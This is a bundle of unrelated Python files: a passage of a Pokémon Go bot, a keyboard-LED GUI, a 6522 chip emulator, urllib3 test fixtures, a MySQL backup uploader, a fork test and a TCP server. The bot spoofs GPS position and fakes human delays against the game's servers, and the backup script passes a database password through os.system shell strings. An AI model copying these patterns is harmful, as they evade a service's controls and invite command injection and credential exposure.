self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi @var ApiWrapper
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.set_signature_lib(self.get_encryption_lib())
self.api.set_hash_lib(self.get_hash_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
return  # bail out after the retry; 'player' is not defined on this code path
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
pokes.sort(key=lambda p: p.cp, reverse=True)
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.wake_location:
msg = "Wake up location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': self.wake_location['raw'],
'position': self.wake_location['coord']
}
)
self.api.set_position(*self.wake_location['coord'])
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
json_file = os.path.join(_base_dir, 'data', 'last-location-%s.json' % self.config.username)
try:
with open(json_file, "r") as infile:
location_json = json.load(infile)
except (IOError, ValueError):
# Unable to read json file.
# File may be corrupt. Create a new one.
location_json = []
except:
raise FileIOException("Unexpected error reading from {}".web_inventory)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if given location name, belongs to favorite_locations
favorite_location_coords = self._get_pos_by_fav_location(location_name)
if favorite_location_coords is not None:
return favorite_location_coords
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}(?:[.]\d+)?", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def _get_pos_by_fav_location(self, location_name):
location_name = location_name.lower()
coords = None
for location in self.config.favorite_locations:
if location.get('name').lower() == location_name:
coords = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location.get('coords').strip()
)
if len(coords) >= 2:
self.logger.info('Favorite location found: {} ({})'.format(location_name, coords))
break
#TODO: This is real bad
if coords is None:
return coords
else:
return float(coords[0]), float(coords[1]), (float(coords[2]) if len(coords) == 3 else self.alt)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold and not self.hb_locked:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
responses = request.call()
if responses['responses']['GET_PLAYER']['success'] == True:
# we get the player_data anyway, might as well store it
self._player = responses['responses']['GET_PLAYER']['player_data']
self.event_manager.emit(
'player_data',
sender=self,
level='debug',
formatted='player_data: {player_data}',
data={'player_data': self._player}
)
if responses['responses']['CHECK_AWARDED_BADGES']['success'] == True:
# store awarded_badges response to be used in a task or as part of the heartbeat
self._awarded_badges = responses['responses']['CHECK_AWARDED_BADGES']
if 'awarded_badges' in self._awarded_badges:
i = 0
for badge in self._awarded_badges['awarded_badges']:
badgelevel = self._awarded_badges['awarded_badge_levels'][i]
badgename = BadgeType_pb2._BADGETYPE.values_by_number[badge].name
i += 1
self.event_manager.emit(
'badges',
sender=self,
level='info',
formatted='awarded badge: {badge}, lvl {level}',
data={'badge': badgename,
'level': badgelevel}
)
human_behaviour.action_delay(3, 10)
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
threading.Timer(self.heartbeat_threshold, self.heartbeat).start()
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
player_stats = player()
if player_stats:
nextlvlxp = (int(player_stats.next_level_xp) - int(player_stats.exp))
self.logger.info(
'Level: {}'.format(player_stats.level) +
' (Next Level: {} XP)'.format(nextlvlxp) +
' (Total: {} XP)'
''.format(player_stats.exp))
self.logger.info(
'Pokemon Captured: '
'{}'.format(player_stats.pokemons_captured) +
' | Pokestops Visited: '
'{}'.format(player_stats.poke_stop_visits))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.emit_forts_event(self.last_map_object)
#if self.last_map_object:
# print self.last_map_object
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
cached_recent_forts = []
try:
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
except (IOError, ValueError) as e:
self.logger.info('[x] Error while opening cached forts: %s' % e)
except:
raise FileIOException("Unexpected error opening {}".cached_forts_path)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
def _refresh_inventory(self):
# Perform inventory update every n seconds
now = time.time()
if now - self.last_inventory_refresh >= self.inventory_refresh_threshold:
inventory.refresh_inventory()
self.last_inventory_refresh = now
self.inventory_refresh_counter += 1
|
maingui.py
|
from mainwin import *
from PyQt5.QtCore import (QByteArray, QDataStream, QFile, QFileInfo,
QIODevice, QPoint, QPointF, QRectF, Qt, QTimer)
from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog,QGraphicsScene,QGraphicsPixmapItem,QGraphicsItem,QStyle,QGraphicsTextItem,QMenu
from PyQt5.QtGui import QImage,QPen,QBrush,QTransform,QColor
from PyQt5.QtGui import QPixmap
import sys
import cv2
import numpy as np
import threading
from kbled import keyboard_led
from kbapi import keyboard_ctl
class My_Application(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.tabWidget.setCurrentIndex(0)
self.kb = keyboard_ctl()
self.leds=keyboard_led(self.kb)
self.video_opened=False
self.video_running=False
self.leddata=bytearray(272)
self.ui.mode_set_btn.clicked.connect(self.set_mode_func)
self.ui.connect_btn.clicked.connect(self.connectfunc)
self.ui.stop_btn.clicked.connect(self.stopfunc)
self.ui.video_play_btn.clicked.connect(self.videofunc)
self.videothreadid = threading.Thread(target=self.videothread)
self.videolock=threading.Lock()
self.previewtimer=QTimer()
self.previewtimer.timeout.connect(self.updateperview)
self.videotimer=QTimer()
self.videotimer.timeout.connect(self.videotimerfunc)
def connectfunc(self):
self.kb.init_hid_interface()
if(self.kb.wait_for_kb(1000)==False):
self.ui.logbox.appendPlainText("Connect Failed\n")
self.kb.stop_and_wait()
return
self.startTimer()
def stopfunc(self):
self.stopTimer()
self.stopvideo()
self.kb.stop_and_wait()
def closeEvent(self, event):
self.kb.stop_and_wait()
self.stopvideo()
def set_mode_func(self):
if self.kb.isdeviceoen==False:
return
try:
mode=int(self.ui.modebox.text())
except:
mode=0
self.leds.switchmode(mode)
def startTimer(self):
self.previewtimer.start(100)
def stopTimer(self):
self.previewtimer.stop()
def updateperview(self):
if(self.kb.wait_for_kb(1000)==False):return
if(self.video_running==False):
lens,self.leddata=self.leds.getled()
if(lens<0):
return
width=(self.ui.preview_box.width()-10)
height=(self.ui.preview_box.height()-10)
img=self.leds.getpreview_rgb(self.leddata,(width,height))
previewimg = QImage(img,
width, height, width*3,
QImage.Format_RGB888)
pix = QPixmap.fromImage(previewimg)
self.preitem = QGraphicsPixmapItem(pix)
self.preitem.setScale(1)
self.prescene = QGraphicsScene()
self.prescene.addItem(self.preitem)
self.ui.preview_box.setScene(self.prescene)
def videofunc(self):
if self.kb.wait_for_kb(100)==False:
return
if self.videothreadid.is_alive():
self.video_running=False
self.videothreadid.join()
self.videolink=self.ui.video_link_box.text()
self.cvvideo=cv2.VideoCapture()
self.cvvideo.open(self.videolink)
if(self.cvvideo.isOpened()):
self.leds.switchmode(0xff)
fps=self.cvvideo.get(cv2.CAP_PROP_FPS)
self.videotimer.start(int(np.floor(1000/fps)))
self.video_opened=True
self.video_running=True
self.videothreadid = threading.Thread(target=self.videothread)
self.videothreadid.start()
def videotimerfunc(self):
if(self.videolock.locked()):
self.videolock.release()
def videothread(self):
kbresetflag=False
while self.video_running and self.video_opened:
self.videolock.acquire()
if kbresetflag:
self.leds.switchmode(0xff)
ret, frame1 = self.cvvideo.read()
if(ret):
if self.kb.wait_for_kb(100) == False:
kbresetflag=True
continue
self.leddata=self.leds.play_frame_full(frame1)
else:
self.cvvideo.set(cv2.CAP_PROP_POS_FRAMES,0)
# kb.stop_and_wait()
# sys.exit(0)
def stopvideo(self):
if self.videothreadid.is_alive():
self.video_running=False
self.videolock.release()
self.videothreadid.join()
self.cvvideo.release()
self.video_opened=False
self.videotimer.stop()
if __name__ == '__main__':
app = QApplication(sys.argv)
class_instance = My_Application()
class_instance.show()
sys.exit(app.exec_())
|
via65c22.py
|
import sys
import time
import threading
from py65.utils import console
from py65816.utils import db_console
class VIA():
SR = 4
SET_CLEAR = 128
def __init__(self, start_addr, mpu):
self.mpu = mpu
self.VIA_SR = start_addr + 0x0a # shift register
self.VIA_IFR = start_addr + 0x0d # interrupt flags register
self.VIA_IER = start_addr + 0x0e # interrupt enable register
self.SRThread = False
self.escape = False
self.name = 'VIA'
# init
self.reset()
self.install_interrupts()
def install_interrupts(self):
def getc(address):
char = console.getch_noblock(sys.stdin)
time.sleep(.1) # reduce cpu usage (~55% to ~2%) in Forth interpret loop (comment out for full speed ops)
if char:
byte = ord(char)
if self.escape:
self.escape = False
if byte == 0x51 or byte == 0x71:
self.mpu.pc = 65527 # set pc to a break instruction which drops us to the monitor program
byte = 0
else:
if byte == 0x1b:
self.escape = True
byte = 0
else:
self.mpu.memory[self.VIA_IFR] &= 0xfb
else:
byte = 0
return byte
def SR_enable(address, value):
if value & self.SET_CLEAR:
# enable interrupts
if value & self.SR and not self.SRThread:
t = threading.Thread(target=SR_thread, daemon = True)
self.SRThread = True
t.start()
else:
# disable interrupts
if value & self.SR and self.SRThread:
self.SRThread = False
def SR_thread():
mpu = self.mpu
while(self.SRThread):
# See ACIA for discussion of giving emulator time to process interrupt
# time.sleep(.05)
if (mpu.IRQ_pin == 1) and (mpu.p & mpu.INTERRUPT == 0):
if (mpu.p & mpu.INTERRUPT == 0) and mpu.IRQ_pin:
if db_console.kbhit():
mpu.memory[self.VIA_IFR] |= 0x04
mpu.IRQ_pin = 0
count_irq = 0 # we need a short delay here
while count_irq < 100:
count_irq += 1
else:
# pause to reduce system resources churning when
# we're waiting for keyboard input
time.sleep(0.05)
else:
time.sleep(0.001)
self.mpu.memory.subscribe_to_write([self.VIA_IER], SR_enable)
self.mpu.memory.subscribe_to_read([self.VIA_SR], getc)
def reset(self):
self.mpu.memory[self.VIA_IER] = 0
self.mpu.memory[self.VIA_IFR] = 0
#def irq(self):
#return (IFR6 and IER6) or (IFR5 and IER5) or (IFR4 and IER4) or (IFR3 and IER3) or (IFR2 and IER2) or (IFR1 and IER1) or (IFR0 and IER0)
#return (self.mpu.memory[self.VIA_IFR] and self.SR) and ((self.mpu.memory[self.VIA_IER] and self.SR))
|
conftest.py
|
import collections
import contextlib
import platform
import socket
import ssl
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.server import HAS_IPV6, run_tornado_app
from dummyserver.testcase import HTTPSDummyServerTestCase
from urllib3.util import ssl_
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
server_cert_path = str(tmpdir / "server.pem")
server_key_path = str(tmpdir / "server.key")
ca.cert_pem.write_to_path(ca_cert_path)
server_cert.private_key_pem.write_to_path(server_key_path)
server_cert.cert_chain_pems[0].write_to_path(server_cert_path)
server_certs = {"keyfile": server_key_path, "certfile": server_cert_path}
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name="localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ip_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert("127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert("::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
@pytest.fixture(scope="session")
def supported_tls_versions():
# We have to create an actual TLS connection
# to test if the TLS version is not disabled by
# OpenSSL config. Ubuntu 20.04 specifically
# disables TLSv1 and TLSv1.1.
tls_versions = set()
_server = HTTPSDummyServerTestCase()
_server._start_server()
for _ssl_version_name in (
"PROTOCOL_TLSv1",
"PROTOCOL_TLSv1_1",
"PROTOCOL_TLSv1_2",
"PROTOCOL_TLS",
):
_ssl_version = getattr(ssl, _ssl_version_name, 0)
if _ssl_version == 0:
continue
_sock = socket.create_connection((_server.host, _server.port))
try:
_sock = ssl_.ssl_wrap_socket(
_sock, cert_reqs=ssl.CERT_NONE, ssl_version=_ssl_version
)
except ssl.SSLError:
pass
else:
tls_versions.add(_sock.version())
_sock.close()
_server._stop_server()
return tls_versions
@pytest.fixture(scope="function")
def requires_tlsv1(supported_tls_versions):
"""Test requires TLSv1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1") or "TLSv1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1")
@pytest.fixture(scope="function")
def requires_tlsv1_1(supported_tls_versions):
"""Test requires TLSv1.1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_1") or "TLSv1.1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.1")
@pytest.fixture(scope="function")
def requires_tlsv1_2(supported_tls_versions):
"""Test requires TLSv1.2 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_2") or "TLSv1.2" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.2")
@pytest.fixture(scope="function")
def requires_tlsv1_3(supported_tls_versions):
"""Test requires TLSv1.3 available"""
if (
not getattr(ssl, "HAS_TLSv1_3", False)
or "TLSv1.3" not in supported_tls_versions
):
pytest.skip("Test requires TLSv1.3")
|
BakSql.py
|
#!/usr/bin/python3
import sys
import time
import os
import zipfile
import threading
import Config
from DirOrFileToOSS import DirOrFileToOSS
isDelFile = True
db_host = Config.db_host
db_user = Config.db_user
db_passwd = Config.db_passwd
db_name = Config.db_name
db_charset = Config.db_charset
mysqldump_path = Config.mysqldump_path
# Date suffix for the current backup directory
dirsubfix = time.strftime('%Y/%m', time.localtime())
locBakPath = Config.bakRootPath + '/sqlbak/' + dirsubfix
if mysqldump_path == '':
mysqldump_path = 'mysqldump'
isDocker = Config.isDocker
class kl_log:
def __init__(self, filename='kl_log'):
self.filename = filename + '-'
self.filepath = Config.logPath + '/'
def setpath(self, filepath):
self.filepath = filepath
def setfilename(self, filename):
self.filename = filename + '-'
def write(self, data='', model='a'):
fname = time.strftime('%Y-%m-%d', time.localtime())
fpath = '%s%s%s.log' % (self.filepath, self.filename, fname)
if not os.path.exists(os.path.dirname(fpath)):
os.makedirs(os.path.dirname(fpath))
ti = time.strftime('%Y-%m-%d %X', time.localtime())
f = open(fpath, model)
f.write("%s: %s\n" % (ti, data))
f.close()
return True
log = kl_log()
def runCmd(str):
print(str)
os.system(str)
def bakmysql(db_name, sss):
try:
global baknum
baknum = baknum + 1
db_backup_name = locBakPath + r"/%s_%s.sql" % (time.strftime("%Y-%m-%d_%H-%M-%S"), db_name)
if not os.path.exists(os.path.dirname(db_backup_name)):
os.makedirs(os.path.dirname(db_backup_name))
zip_src = db_backup_name
zip_dest = zip_src + ".zip"
database.append(zip_dest)
print("开始备份数据库:%s..." % db_name)
if isDocker:
runCmd("docker exec mysql mysqldump --skip-extended-insert --skip-comments -u%s -p%s %s --default_character-set=%s > %s" % (db_user, db_passwd, db_name, db_charset, db_backup_name))
else:
runCmd(mysqldump_path + " --skip-extended-insert --skip-comments -h%s -u%s -p%s %s --default_character-set=%s > %s" % (db_host, db_user, db_passwd, db_name, db_charset, db_backup_name))
if os.path.isfile(db_backup_name):
print("开始压缩数据库:%s..." % db_name)
f = zipfile.ZipFile(zip_dest, 'w', zipfile.ZIP_DEFLATED)
[dirname, filename] = os.path.split(zip_src)
f.write(zip_src, './' + filename)
f.close()
os.remove(zip_src)
print("数据库%s备份完成!" % db_name)
else:
print("数据库SQL文件不存在!")
baknum = baknum - 1
except:
baknum = baknum - 1
log.write('Error while backing up database %s' % db_name)
if __name__ == "__main__":
baknum = 0
database = []
for i in db_name:
time.sleep(1)
threading.Thread(target=bakmysql, args=(i, '')).start()
time.sleep(3)
while baknum != 0:
time.sleep(1)
sys.stdout.write('%s backup threads running...\r' % baknum)
sys.stdout.flush()
pass
# Compress all completed database backups into a single archive
print('Compressing all database backups into one file...')
db_backup_name = locBakPath + r"/database-%s.zip" % (time.strftime("%Y-%m-%d_%H-%M-%S"))
f = zipfile.ZipFile(db_backup_name, 'w', zipfile.ZIP_DEFLATED)
for i in database:
if os.path.isfile(i):
[dirname, filename] = os.path.split(i)
f.write(i, './' + filename)
os.remove(i)
f.close()
print('Uploading database backups to OSS...')
config = {
'accessKeyID': Config.accessKeyID,
'accessKeySecret': Config.accessKeySecret,
'endpoint': Config.endpoint,
'bucketName': Config.bucketName,
'baklist': [
# git backup
{
# Directory to back up (no trailing /) or full path to a file
'path': db_backup_name,
# Local backup path
'locBakPath': Config.bakRootPath + '/sqlbak',
# OSS upload path, must end with /
'ossPath': 'DataAutoBak/sqlbak/',
# Files or directories to ignore
'ignoreDirOrFile': ['.git', 'runtime', 'Data', 'aspnet_client', 'imagethumb'],
# Whether to delete the local backup; has no effect when isUploadOss is False
'isRemoveLocBak': False,
# Whether to upload to OSS
'isUploadOss': True
},
]
}
bak = DirOrFileToOSS(config)
bak.run()
|
_fail_fork.py
|
import signal
import multiprocessing as mp
from openmp_parallel_sum import parallel_sum
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('Test compat openMP/multproc')
parser.add_argument('--start', type=str, default='fork',
help='define start method tested with openMP')
args = parser.parse_args()
parallel_sum(10)
mp.set_start_method(args.start)
p = mp.Process(target=parallel_sum, args=(10,))
def raise_timeout(a, b):
print("TIMEOUT - parallel_sum could not complete in less than a sec")
p.terminate()
signal.signal(signal.SIGALRM, raise_timeout)
signal.alarm(1)
p.start()
p.join()
print("done")
|
ReliableCommunication.py
|
import socket
from datetime import datetime
import time, threading, sys, json
'''
TCP Server class
'''
class Server:
MAX_CLIENTS = 5
PORT_IN_USE_TIMEOUT = 3
def __init__(self, address, port, messageDataType="json", byteOrder="little", sendMostRecent=True):
'''
Create a TCP Server object. Call start() to run it.
@param string address address to run on. eg: '192.168.1.23'
@param int port port to host on. eg: 3000
@param string messageDataType 'json' or 'string' to auto parse messages. Otherwise will be binary
@param string byteOrder 'little' or 'big' endian. Other ReliableCommunication scripts use 'little'. But if you are connecting to a different server, they may use big endian numbers for their headers.
@param bool sendMostRecent (unused) whether to drop messages queued for sending
'''
self.port = port
self.address = address
self.byteOrder = byteOrder
self.conn = None
self.clients = []
self.sock = None
self.STOP = False
self.dataToSend = None
self.sendMostRecent = sendMostRecent
self.lock = threading.Lock()
self.messageDataType = messageDataType
self.__onmessage_callbacks__ = []
self.__onconnect_callbacks__ = []
self.__onclose_callbacks__ = []
self.thread = threading.Thread(target=self.__accept_clients_loop__, name="Server {} newclient_accept".format(self.port))
print("[Server "+str(self.port)+"] Initialized.")
def start(self):
'''
Starts the server - begins accepting clients
will create threads for each client that connects.
Allows for Server.MAX_CLIENTS number of clients to connect
'''
self.thread.start()
def __accept_clients_loop__(self):
''' Constantly listen and accept clients '''
print("[Server {}] Open for new connections".format(self.port))
# Constantly look for a connection
while not self.STOP:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.bind((self.address, self.port))
except:
print("[Server "+str(self.port)+"] Port already in use")
self.sock.close()
self.sock = None
time.sleep(Server.PORT_IN_USE_TIMEOUT)
continue
self.sock.listen(Server.MAX_CLIENTS)
while not self.STOP:
# Accept incoming connections
self.sock.settimeout(3)
try:
conn, client = self.sock.accept()
# Create Client object
clientObject = Client(client[0], client[1], True, conn, self.messageDataType, self.byteOrder, self.sendMostRecent)
# subscribe to client events
clientObject.add_onmessage_callback(self.__onmessage_caller__)
clientObject.add_onclose_callback(self.__remove_client__)
clientObject.add_onclose_callback(self.__onclose_caller__)
self.clients.append(clientObject)
# Start listener loop
clientObject.listener.start()
# Call onConnect subscribers
threading.Thread(target=self.__onconnect_caller__, args=(clientObject,), name="Server {} onconnect callbacks".format(self.port)).start()
except socket.timeout:
continue
except Exception as e:
self.stop()
raise e
if (self.sock):
self.sock.close()
print("[Server {}] Socket Closed".format(self.port))
'''
CALLBACK METHODS
'''
def __onmessage_caller__(self, message):
''' Calls all of the subscribed listeners whenever a client gets a message '''
for callback in self.__onmessage_callbacks__:
callback(message)
def __onclose_caller__(self, client):
''' Calls all of the subscribed onclose listeners whenever a client disconnects '''
for callback in self.__onclose_callbacks__:
callback(client)
def __onconnect_caller__(self, client):
''' Calls all of the subscribed onconnect listeners whenever a client connects '''
for callback in self.__onconnect_callbacks__:
callback(client)
def add_onmessage_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when server receives a message from any of the clients
function will be called in the order they are added
@param func the function to add. eg: myServer.add_onmessage_callback(dosomething)
'''
self.__onmessage_callbacks__.append(func)
def add_onclose_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when any client disconnects.
functions will be called in the order they are added
@param func the function to add. eg: myServer.add_onclose_callback(dosomething)
'''
self.__onclose_callbacks__.append(func)
def add_onconnect_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when any client connects.
functions will be called in the order they are added
@param func the function to add. eg: myServer.add_onconnect_callback(dosomething)
'''
